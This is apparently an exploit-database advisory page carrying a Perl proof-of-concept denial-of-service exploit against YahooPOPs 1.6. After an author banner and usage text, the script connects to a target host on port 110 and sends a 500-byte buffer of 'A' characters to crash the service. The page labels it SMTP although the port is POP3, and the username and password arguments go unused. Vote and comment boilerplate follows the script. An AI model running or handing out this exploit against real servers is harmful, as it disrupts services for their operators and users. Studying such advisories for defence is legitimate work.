YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

2024.01.26

Fernando Mengali (BR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: 404

use IO::Socket;

   sub intro {
      print q {

	                            ,--,
	                     _ ___/ /\|
	                 ,;'( )__, )  ~
	                //  //   '--; 
	                '   \     | ^
	                     ^    ^

	    [+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

	    [*] Coded by Fernando Mengali

	    [@] e-mail: fernando.mengalli@gmail.com

      }
  }

intro();


    if (!$ARGV[0]) {
        print "\nUsage: $0 <ip> <username> <password>\n";
        exit(0);
}

my $host = $ARGV[0];
my $username = $ARGV[1];
my $password = $ARGV[2];
my $port = 110;
my $payload  = "A" x 500;

my $ip = inet_aton($ARGV[0]);

my $socket = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 10
);

unless ($socket) {
    die "[+] socket() error: $!\n";
}

print "[+] YahooPOPS SMTP detected, constructing the payload\n";

unless ($socket->send($payload)) {
    die "[+] Sending error, the server probably rebooted.\n";
}

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.